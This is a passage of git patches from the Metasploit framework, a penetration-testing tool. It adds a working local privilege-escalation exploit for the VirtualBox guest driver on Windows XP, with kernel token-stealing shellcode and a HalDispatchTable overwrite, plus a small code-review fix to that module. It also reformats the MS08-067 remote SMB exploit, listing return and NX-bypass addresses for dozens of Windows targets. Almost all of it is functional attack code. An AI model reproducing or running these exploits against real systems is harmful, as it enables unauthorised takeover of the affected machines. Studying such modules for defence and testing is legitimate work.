+        ["DWORD", "nSize", "in"]
+      ])
+  end
+
+  def open_device(dev)
+
+    invalid_handle_value = 0xFFFFFFFF
+
+    r = session.railgun.kernel32.CreateFileA(dev, "FILE_SHARE_WRITE|FILE_SHARE_READ", 0, nil, "OPEN_EXISTING", 0, nil)
+
+    handle = r['return']
+
+    if handle == invalid_handle_value
+      return nil
+    end
+
+    return handle
+  end
+
+  def find_sys_base(drvname)
+    results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
+    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*")
+
+    addresses.each do |address|
+      results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
+      current_drvname = results['lpBaseName'][0..results['return'] - 1]
+      if drvname == nil
+        if current_drvname.downcase.include?('krnl')
+          return [address, current_drvname]
+        end
+      elsif drvname == results['lpBaseName'][0..results['return'] - 1]
+        return [address, current_drvname]
+      end
+    end
+
+    return nil
+  end
+
+  def ring0_shellcode(t)
+
+    tokenswap = "\x60\x64\xA1\x24\x01\x00\x00"
+    tokenswap << "\x8B\x40\x44\x50\xBB\x04"
+    tokenswap << "\x00\x00\x00\x8B\x80\x88"
+    tokenswap << "\x00\x00\x00\x2D\x88"
+    tokenswap << "\x00\x00\x00\x39\x98\x84"
+    tokenswap << "\x00\x00\x00\x75\xED\x8B\xB8\xC8"
+    tokenswap << "\x00\x00\x00\x83\xE7\xF8\x58\xBB"
+    tokenswap << "\x41\x41\x41\x41"
+    tokenswap << "\x8B\x80\x88\x00\x00\x00"
+    tokenswap << "\x2D\x88\x00\x00\x00"
+    tokenswap << "\x39\x98\x84\x00\x00\x00"
+    tokenswap << "\x75\xED\x89\xB8\xC8"
+    tokenswap << "\x00\x00\x00\x61\xC3"
+
+    tokenswap.sub!(/\x41\x41\x41\x41/, [session.sys.process.getpid].pack('<L'))
+
+    return tokenswap
+  end
+
+  def fill_memory(proc, address, length, content)
+
+    result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("L"), nil, [ length ].pack("L"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
+
+    if not proc.memory.writable?(address)
+      vprint_error("Failed to allocate memory")
+      return nil
+    else
+      vprint_good("#{address} is now writable")
+    end
+
+    result = proc.memory.write(address, content)
+
+    if result.nil?
+      vprint_error("Failed to write contents to memory")
+      return nil
+    else
+      vprint_good("Contents successfully written to 0x#{address.to_s(16)}")
+    end
+
+    return address
+  end
+
+  def disclose_addresses(t)
+    addresses = {}
+
+    vprint_status("Getting the Kernel module name...")
+    kernel_info = find_sys_base(nil)
+    if kernel_info.nil?
+      vprint_error("Failed to disclose the Kernel module name")
+      return nil
+    end
+    vprint_good("Kernel module found: #{kernel_info[1]}")
+
+    vprint_status("Getting a Kernel handle...")
+    kernel32_handle = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
+    kernel32_handle = kernel32_handle['return']
+    if kernel32_handle == 0
+      vprint_error("Failed to get a Kernel handle")
+      return nil
+    end
+    vprint_good("Kernel handle acquired")
+
+    vprint_status("Disclosing the HalDispatchTable...")
+    hal_dispatch_table = session.railgun.kernel32.GetProcAddress(kernel32_handle, "HalDispatchTable")
+    hal_dispatch_table = hal_dispatch_table['return']
+    if hal_dispatch_table == 0
+      vprint_error("Failed to disclose the HalDispatchTable")
+      return nil
+    end
+    hal_dispatch_table -= kernel32_handle
+    hal_dispatch_table += kernel_info[0]
+    addresses["halDispatchTable"] = hal_dispatch_table
+    vprint_good("HalDispatchTable found at 0x#{addresses["halDispatchTable"].to_s(16)}")
+
+    return addresses
+  end
+
+
+  def exploit
+
+    vprint_status("Adding the railgun stuff...")
+    add_railgun_functions
+
+    if sysinfo["Architecture"] =~ /wow64/i
+      fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
+    elsif sysinfo["Architecture"] =~ /x64/
+      fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
+    end
+
+    my_target = nil
+    if target.name =~ /Automatic/
+      print_status("Detecting the target system...")
+      os = sysinfo["OS"]
+      print_status("#{os.inspect}")
+      if os =~ /windows xp/i
+        my_target = targets[1]
+        print_status("Running against #{my_target.name}")
+      end
+    else
+      my_target = target
+    end
+
+    if my_target.nil?
+      fail_with(Failure::NoTarget, "Remote system not detected as target, select the target manually")
+    end
+
+    print_status("Checking device...")
+    handle = open_device("\\\\.\\vboxguest")
+    if handle.nil?
+      fail_with(Failure::NoTarget, "\\\\.\\vboxguest device not found")
+    else
+      print_good("\\\\.\\vboxguest found!")
+    end
+
+    print_status("Disclosing the HalDispatchTable address...")
+    @addresses = disclose_addresses(my_target)
+    if @addresses.nil?
+      session.railgun.kernel32.CloseHandle(handle)
+      fail_with(Failure::Unknown, "Filed to disclose necessary address for exploitation. Aborting.")
+    else
+      print_good("Address successfully disclosed.")
+    end
+
+    print_status("Storing the shellcode in memory...")
+    this_proc = session.sys.process.open
+    kernel_shell = ring0_shellcode(my_target)
+    kernel_shell_address = 0x1
+
+    buf = "\x90" * 0x6000
+    buf[0, 56] = "\x50\x00\x00\x00"*14
+    buf[0x5000, kernel_shell.length] = kernel_shell
+
+    result = fill_memory(this_proc, kernel_shell_address, buf.length, buf)
+    if result.nil?
+      session.railgun.kernel32.CloseHandle(handle)
+      fail_with(Failure::Unknown, "Error while storing the kernel stager shellcode on memory")
+    else
+      print_good("Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}")
+    end
+
+    print_status("Triggering the vulnerability, corrupting the HalDispatchTable...")
+    ioctl = session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x22a040, 0x1, 140, @addresses["halDispatchTable"] + 0x4 - 40, 0)
+    session.railgun.kernel32.CloseHandle(handle)
+
+    print_status("Executing the Kernel Stager throw NtQueryIntervalProfile()...")
+    result = session.railgun.ntdll.NtQueryIntervalProfile(2, 4)
+
+    print_status("Checking privileges after exploitation...")
+
+    if not is_system?
+      fail_with(Failure::Unknown, "The exploitation wasn't successful")
+    else
+      print_good("Exploitation successful!")
+    end
+
+    p = payload.encoded
+    print_status("Injecting #{p.length.to_s} bytes to memory and executing it...")
+    if execute_shellcode(p)
+      print_good("Enjoy")
+    else
+      fail_with(Failure::Unknown, "Error while executing the payload")
+    end
+
+  end
+
+end
+

From 6d49f6ecdd8715e508ae964366df6105c2d19d97 Mon Sep 17 00:00:00 2001
From: Jay Smith <jsmith@korelogic.com>
Date: Wed, 16 Jul 2014 14:29:17 -0400
Subject: [PATCH 130/321] Update code to reflect hdmoore's code review.

---
 modules/exploits/windows/local/vbox_guest.rb | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/modules/exploits/windows/local/vbox_guest.rb b/modules/exploits/windows/local/vbox_guest.rb
index 63bd49d110..8196c4425f 100644
--- a/modules/exploits/windows/local/vbox_guest.rb
+++ b/modules/exploits/windows/local/vbox_guest.rb
@@ -89,16 +89,16 @@ class Metasploit3 < Msf::Exploit::Local
 
   def find_sys_base(drvname)
     results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
-    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*")
+    addresses = results['lpImageBase'][0, results['lpcbNeeded']].unpack("V*")
 
     addresses.each do |address|
       results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
-      current_drvname = results['lpBaseName'][0..results['return'] - 1]
+      current_drvname = results['lpBaseName'][0, results['return']]
       if drvname == nil
         if current_drvname.downcase.include?('krnl')
           return [address, current_drvname]
         end
-      elsif drvname == results['lpBaseName'][0..results['return'] - 1]
+      elsif drvname == results['lpBaseName'][0, results['return']]
         return [address, current_drvname]
       end
     end
@@ -122,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Local
     tokenswap << "\x75\xED\x89\xB8\xC8"
     tokenswap << "\x00\x00\x00\x61\xC3"
 
-    tokenswap.sub!(/\x41\x41\x41\x41/, [session.sys.process.getpid].pack('<L'))
+    tokenswap.sub!(/\x41\x41\x41\x41/, [session.sys.process.getpid].pack('V'))
 
     return tokenswap
   end

From b050b5d1df0c96857dcdbd60f2fc2431725d6b18 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Thu, 17 Jul 2014 12:29:20 -0500
Subject: [PATCH 131/321] Rubocop -a on MS08-067

This reduces the number of style guide violations from 230ish to 36.
Nearly all of it has to do with errant parameters, element alignment,
and comment blocks.

Obviously, since this was all automatically fixed, some pretty severe
testing should occur before landing this.

I kind of don't like the automatic styling of the arrays for the
references, but maybe I can get used to it. It's open for discussion.

@jhart-r7 please take a look at this as well -- anything jumping out at
you on this that we should be avoiding for Rubocop?
---
 .../exploits/windows/smb/ms08_067_netapi.rb   | 1195 ++++++++---------
 1 file changed, 587 insertions(+), 608 deletions(-)

diff --git a/modules/exploits/windows/smb/ms08_067_netapi.rb b/modules/exploits/windows/smb/ms08_067_netapi.rb
index fdd61ece0c..9bae23eb02 100644
--- a/modules/exploits/windows/smb/ms08_067_netapi.rb
+++ b/modules/exploits/windows/smb/ms08_067_netapi.rb
@@ -3,18 +3,14 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 require 'msf/core'
 
-
 class Metasploit3 < Msf::Exploit::Remote
   Rank = GreatRanking
 
-
   include Msf::Exploit::Remote::DCERPC
   include Msf::Exploit::Remote::SMB
 
-
   def initialize(info = {})
     super(update_info(info,
       'Name'           => 'MS08-067 Microsoft Server Service Relative Path Stack Corruption',
@@ -38,11 +34,11 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          [ 'CVE', '2008-4250'],
-          [ 'OSVDB', '49243'],
-          [ 'MSB', 'MS08-067' ],
+          %w(CVE 2008-4250),
+          %w(OSVDB 49243),
+          %w(MSB MS08-067),
           # If this vulnerability is found, ms08-67 is exposed as well
-          [ 'URL', 'http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos']
+          ['URL', 'http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos']
         ],
       'DefaultOptions' =>
         {
@@ -64,8 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote
           #
           # Automatic targetting via fingerprinting
           #
-          [ 'Automatic Targeting', { 'auto' => true }	],
-
+          ['Automatic Targeting', { 'auto' => true }],
 
           #
           # UNIVERSAL TARGETS
@@ -75,22 +70,22 @@ class Metasploit3 < Msf::Exploit::Remote
           # Antoine's universal for Windows 2000
           # Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET
           #
-          [ 'Windows 2000 Universal',
-            {
-              'Ret'       => 0x001f1cb0,
-              'Scratch'   => 0x00020408,
-            }
+          ['Windows 2000 Universal',
+           {
+             'Ret'       => 0x001f1cb0,
+             'Scratch'   => 0x00020408,
+           }
           ], # JMP EDI SVCHOST.EXE
 
           #
           # Standard return-to-ESI without NX bypass
           # Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET
           #
-          [ 'Windows XP SP0/SP1 Universal',
-            {
-              'Ret'       => 0x01001361,
-              'Scratch'   => 0x00020408,
-            }
+          ['Windows XP SP0/SP1 Universal',
+           {
+             'Ret'       => 0x01001361,
+             'Scratch'   => 0x00020408,
+           }
           ], # JMP ESI SVCHOST.EXE
 
           #
@@ -98,116 +93,112 @@ class Metasploit3 < Msf::Exploit::Remote
           #
 
           # jduck's AlwaysOn NX Bypass for XP SP2
-          [ 'Windows XP SP2 English (AlwaysOn NX)',
-            {
-              # No pivot is needed, we drop into our rop
-              'Scratch' => 0x00020408,
-              'UseROP'  => '5.1.2600.2180'
-            }
+          ['Windows XP SP2 English (AlwaysOn NX)',
+           {
+             # No pivot is needed, we drop into our rop
+             'Scratch' => 0x00020408,
+             'UseROP'  => '5.1.2600.2180'
+           }
           ],
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP2 English (NX)',
-            {
-              'Ret'       => 0x6f88f727,
-              'DisableNX' => 0x6f8916e2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP2 English (NX)',
+           {
+             'Ret'       => 0x6f88f727,
+             'DisableNX' => 0x6f8916e2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
-
           # jduck's AlwaysOn NX Bypass for XP SP3
-          [ 'Windows XP SP3 English (AlwaysOn NX)',
-            {
-              # No pivot is needed, we drop into our rop
-              'Scratch' => 0x00020408,
-              'UseROP'  => '5.1.2600.5512'
-            }
+          ['Windows XP SP3 English (AlwaysOn NX)',
+           {
+             # No pivot is needed, we drop into our rop
+             'Scratch' => 0x00020408,
+             'UseROP'  => '5.1.2600.5512'
+           }
           ],
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP3 English (NX)',
-            {
-              'Ret'       => 0x6f88f807,
-              'DisableNX' => 0x6f8917c2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP3 English (NX)',
+           {
+             'Ret'       => 0x6f88f807,
+             'DisableNX' => 0x6f8917c2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Standard return-to-ESI without NX bypass
-          [ 'Windows 2003 SP0 Universal',
-            {
-              'Ret'       => 0x0100129e,
-              'Scratch'   => 0x00020408,
-            }
+          ['Windows 2003 SP0 Universal',
+           {
+             'Ret'       => 0x0100129e,
+             'Scratch'   => 0x00020408,
+           }
           ], # JMP ESI SVCHOST.EXE
 
-
           # Standard return-to-ESI without NX bypass
-          [ 'Windows 2003 SP1 English (NO NX)',
-            {
-              'Ret'       => 0x71bf21a2,
-              'Scratch'   => 0x00020408,
-            }
+          ['Windows 2003 SP1 English (NO NX)',
+           {
+             'Ret'       => 0x71bf21a2,
+             'Scratch'   => 0x00020408,
+           }
           ], # JMP ESI WS2HELP.DLL
 
           # Brett Moore's crafty NX bypass for 2003 SP1
-          [ 'Windows 2003 SP1 English (NX)',
-            {
-              'RetDec'    => 0x7c90568c,	 # dec ESI, ret @SHELL32.DLL
-              'RetPop'    => 0x7ca27cf4,  # push ESI, pop EBP, ret @SHELL32.DLL
-              'JmpESP'    => 0x7c86fed3,  # jmp ESP @NTDLL.DLL
-              'DisableNX' => 0x7c83e413,  # NX disable @NTDLL.DLL
-              'Scratch'   => 0x00020408,
-            }
-          ],
-
-
-          # Standard return-to-ESI without NX bypass
-          [ 'Windows 2003 SP1 Japanese (NO NX)',
-            {
-              'Ret'       => 0x71a921a2,
-              'Scratch'   => 0x00020408,
-            }
-          ], # JMP ESI WS2HELP.DLL
-
-
-          # Standard return-to-ESI without NX bypass
-          [ 'Windows 2003 SP2 English (NO NX)',
-            {
-              'Ret'       => 0x71bf3969,
-              'Scratch'   => 0x00020408,
-            }
-          ], # JMP ESI WS2HELP.DLL
-
-          # Brett Moore's crafty NX bypass for 2003 SP2
-          [ 'Windows 2003 SP2 English (NX)',
-            {
-              'RetDec'    => 0x7c86beb8,  # dec ESI, ret @NTDLL.DLL
-              'RetPop'    => 0x7ca1e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
-              'JmpESP'    => 0x7c86a01b,  # jmp ESP @NTDLL.DLL
-              'DisableNX' => 0x7c83f517,  # NX disable @NTDLL.DLL
-              'Scratch'   => 0x00020408,
-            }
+          ['Windows 2003 SP1 English (NX)',
+           {
+             'RetDec'    => 0x7c90568c,	 # dec ESI, ret @SHELL32.DLL
+             'RetPop'    => 0x7ca27cf4,  # push ESI, pop EBP, ret @SHELL32.DLL
+             'JmpESP'    => 0x7c86fed3,  # jmp ESP @NTDLL.DLL
+             'DisableNX' => 0x7c83e413,  # NX disable @NTDLL.DLL
+             'Scratch'   => 0x00020408,
+           }
           ],
 
           # Standard return-to-ESI without NX bypass
-          [ 'Windows 2003 SP2 German (NO NX)',
-            {
-              'Ret'       => 0x71a03969,
-              'Scratch'   => 0x00020408,
-            }
+          ['Windows 2003 SP1 Japanese (NO NX)',
+           {
+             'Ret'       => 0x71a921a2,
+             'Scratch'   => 0x00020408,
+           }
+          ], # JMP ESI WS2HELP.DLL
+
+          # Standard return-to-ESI without NX bypass
+          ['Windows 2003 SP2 English (NO NX)',
+           {
+             'Ret'       => 0x71bf3969,
+             'Scratch'   => 0x00020408,
+           }
           ], # JMP ESI WS2HELP.DLL
 
           # Brett Moore's crafty NX bypass for 2003 SP2
-          [ 'Windows 2003 SP2 German (NX)',
-            {
-              'RetDec'    => 0x7c98beb8,  # dec ESI, ret @NTDLL.DLL
-              'RetPop'    => 0x7cb3e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
-              'JmpESP'    => 0x7c98a01b,  # jmp ESP @NTDLL.DLL
-              'DisableNX' => 0x7c95f517,  # NX disable @NTDLL.DLL
-              'Scratch'   => 0x00020408,
-            }
+          ['Windows 2003 SP2 English (NX)',
+           {
+             'RetDec'    => 0x7c86beb8,  # dec ESI, ret @NTDLL.DLL
+             'RetPop'    => 0x7ca1e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
+             'JmpESP'    => 0x7c86a01b,  # jmp ESP @NTDLL.DLL
+             'DisableNX' => 0x7c83f517,  # NX disable @NTDLL.DLL
+             'Scratch'   => 0x00020408,
+           }
+          ],
+
+          # Standard return-to-ESI without NX bypass
+          ['Windows 2003 SP2 German (NO NX)',
+           {
+             'Ret'       => 0x71a03969,
+             'Scratch'   => 0x00020408,
+           }
+          ], # JMP ESI WS2HELP.DLL
+
+          # Brett Moore's crafty NX bypass for 2003 SP2
+          ['Windows 2003 SP2 German (NX)',
+           {
+             'RetDec'    => 0x7c98beb8,  # dec ESI, ret @NTDLL.DLL
+             'RetPop'    => 0x7cb3e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
+             'JmpESP'    => 0x7c98a01b,  # jmp ESP @NTDLL.DLL
+             'DisableNX' => 0x7c95f517,  # NX disable @NTDLL.DLL
+             'Scratch'   => 0x00020408,
+           }
           ],
 
           #
@@ -215,484 +206,482 @@ class Metasploit3 < Msf::Exploit::Remote
           #
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP2 Arabic (NX)',
-            {
-              'Ret'       => 0x6fd8f727,
-              'DisableNX' => 0x6fd916e2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP2 Arabic (NX)',
+           {
+             'Ret'       => 0x6fd8f727,
+             'DisableNX' => 0x6fd916e2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP2 Chinese - Traditional / Taiwan (NX)',
-            {
-              'Ret'       => 0x5860f727,
-              'DisableNX' => 0x586116e2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP2 Chinese - Traditional / Taiwan (NX)',
+           {
+             'Ret'       => 0x5860f727,
+             'DisableNX' => 0x586116e2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP2 Chinese - Simplified (NX)',
-            {
-              'Ret'       => 0x58fbf727,
-              'DisableNX' => 0x58fc16e2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP2 Chinese - Simplified (NX)',
+           {
+             'Ret'       => 0x58fbf727,
+             'DisableNX' => 0x58fc16e2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP2 Chinese - Traditional (NX)',
-            {
-              'Ret'       => 0x5860f727,
-              'DisableNX' => 0x586116e2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP2 Chinese - Traditional (NX)',
+           {
+             'Ret'       => 0x5860f727,
+             'DisableNX' => 0x586116e2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP2 Czech (NX)',
-            {
-              'Ret'       => 0x6fe1f727,
-              'DisableNX' => 0x6fe216e2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP2 Czech (NX)',
+           {
+             'Ret'       => 0x6fe1f727,
+             'DisableNX' => 0x6fe216e2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP2 Danish (NX)',
-            {
-              'Ret'       => 0x5978f727,
-              'DisableNX' => 0x597916e2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP2 Danish (NX)',
+           {
+             'Ret'       => 0x5978f727,
+             'DisableNX' => 0x597916e2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP2 German (NX)',
-            {
-              'Ret'       => 0x6fd9f727,
-              'DisableNX' => 0x6fda16e2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP2 German (NX)',
+           {
+             'Ret'       => 0x6fd9f727,
+             'DisableNX' => 0x6fda16e2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP2 Greek (NX)',
-            {
-              'Ret'       => 0x592af727,
-              'DisableNX' => 0x592b16e2,
-              'Scratch'   => 0x00020408
-            }
-          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
-
-
-          # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP2 Spanish (NX)',
-            {
-              'Ret'       => 0x6fdbf727,
-              'DisableNX' => 0x6fdc16e2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP2 Greek (NX)',
+           {
+             'Ret'       => 0x592af727,
+             'DisableNX' => 0x592b16e2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP2 Finnish (NX)',
-            {
-              'Ret'       => 0x597df727,
-              'DisableNX' => 0x597e16e2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP2 Spanish (NX)',
+           {
+             'Ret'       => 0x6fdbf727,
+             'DisableNX' => 0x6fdc16e2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP2 French (NX)',
-            {
-              'Ret'       => 0x595bf727,
-              'DisableNX' => 0x595c16e2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP2 Finnish (NX)',
+           {
+             'Ret'       => 0x597df727,
+             'DisableNX' => 0x597e16e2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP2 Hebrew (NX)',
-            {
-              'Ret'       => 0x5940f727,
-              'DisableNX' => 0x594116e2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP2 French (NX)',
+           {
+             'Ret'       => 0x595bf727,
+             'DisableNX' => 0x595c16e2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP2 Hungarian (NX)',
-            {
-              'Ret'       => 0x5970f727,
-              'DisableNX' => 0x597116e2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP2 Hebrew (NX)',
+           {
+             'Ret'       => 0x5940f727,
+             'DisableNX' => 0x594116e2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP2 Italian (NX)',
-            {
-              'Ret'       => 0x596bf727,
-              'DisableNX' => 0x596c16e2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP2 Hungarian (NX)',
+           {
+             'Ret'       => 0x5970f727,
+             'DisableNX' => 0x597116e2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP2 Japanese (NX)',
-            {
-              'Ret'       => 0x567fd3be,
-              'DisableNX' => 0x568016e2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP2 Italian (NX)',
+           {
+             'Ret'       => 0x596bf727,
+             'DisableNX' => 0x596c16e2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP2 Korean (NX)',
-            {
-              'Ret'       => 0x6fd6f727,
-              'DisableNX' => 0x6fd716e2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP2 Japanese (NX)',
+           {
+             'Ret'       => 0x567fd3be,
+             'DisableNX' => 0x568016e2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP2 Dutch (NX)',
-            {
-              'Ret'       => 0x596cf727,
-              'DisableNX' => 0x596d16e2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP2 Korean (NX)',
+           {
+             'Ret'       => 0x6fd6f727,
+             'DisableNX' => 0x6fd716e2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP2 Norwegian (NX)',
-            {
-              'Ret'       => 0x597cf727,
-              'DisableNX' => 0x597d16e2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP2 Dutch (NX)',
+           {
+             'Ret'       => 0x596cf727,
+             'DisableNX' => 0x596d16e2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP2 Polish (NX)',
-            {
-              'Ret'       => 0x5941f727,
-              'DisableNX' => 0x594216e2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP2 Norwegian (NX)',
+           {
+             'Ret'       => 0x597cf727,
+             'DisableNX' => 0x597d16e2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP2 Portuguese - Brazilian (NX)',
-            {
-              'Ret'       => 0x596ff727,
-              'DisableNX' => 0x597016e2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP2 Polish (NX)',
+           {
+             'Ret'       => 0x5941f727,
+             'DisableNX' => 0x594216e2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP2 Portuguese (NX)',
-            {
-              'Ret'       => 0x596bf727,
-              'DisableNX' => 0x596c16e2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP2 Portuguese - Brazilian (NX)',
+           {
+             'Ret'       => 0x596ff727,
+             'DisableNX' => 0x597016e2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP2 Russian (NX)',
-            {
-              'Ret'       => 0x6fe1f727,
-              'DisableNX' => 0x6fe216e2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP2 Portuguese (NX)',
+           {
+             'Ret'       => 0x596bf727,
+             'DisableNX' => 0x596c16e2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP2 Swedish (NX)',
-            {
-              'Ret'       => 0x597af727,
-              'DisableNX' => 0x597b16e2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP2 Russian (NX)',
+           {
+             'Ret'       => 0x6fe1f727,
+             'DisableNX' => 0x6fe216e2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP2 Turkish (NX)',
-            {
-              'Ret'       => 0x5a78f727,
-              'DisableNX' => 0x5a7916e2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP2 Swedish (NX)',
+           {
+             'Ret'       => 0x597af727,
+             'DisableNX' => 0x597b16e2,
+             'Scratch'   => 0x00020408
+           }
